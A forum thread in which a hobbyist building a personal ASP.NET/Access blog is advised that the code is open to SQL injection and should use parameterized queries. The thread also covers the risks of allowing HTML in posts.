Originally posted by: torpid
You are saying that the memo field allows any amount of text as long as it contains no HTML? Or what?
Yeah, the memo field will allow as many characters as I want unless it has html (up to 65,000 or whatever the field limit is in Access).
The point he's trying to make above is that your code as written is highly vulnerable to SQL injections. Ideally the solution is to use a parameterized sql like this: Insert into Items Values(?, ?, ?, ?) and then attach OLEDBParameters to the OLEDBCommand before executing.
OK, I think I see what you're saying here. I'm not familiar with the OLEDBParameters and so on, but I can read up on that. Thanks for pointing me in the right direction.
Are you do stuff like replacing single quote with double quote to prevent malformed SQL?
Yeah... Single quotes denote text/memo fields in Access, while those without are any other form. I asked about that
here quite a while ago. I finally got a chance to work on it again.
Also, allowing HTML characters into posts itself is very problematic, because they could do some pretty sneaky stuff with their posts. That is why almost all places where you can post things use special codes and disallow html, or at the least only allow certain html tags.
I understand the security concerns with allowing html, so I made it so only someone with my username can post using this form. In addition, all other forms have validateRequest="true", while on this one I set validateRequest="false". Basically, it's a way for me to allow myself to post html (links, pics, whatever) and not anyone else, which I think is pretty safe, barring someone gaining access to my account. I'm sure there's a better way to do this, but I just want something that works. It's just my personal blog/message board, so it doesn't need to be terribly efficient or flexible.
Thanks for the help. :beer: I'll see if I can't figure out some of the parametrization stuff when I get some more time to work on it.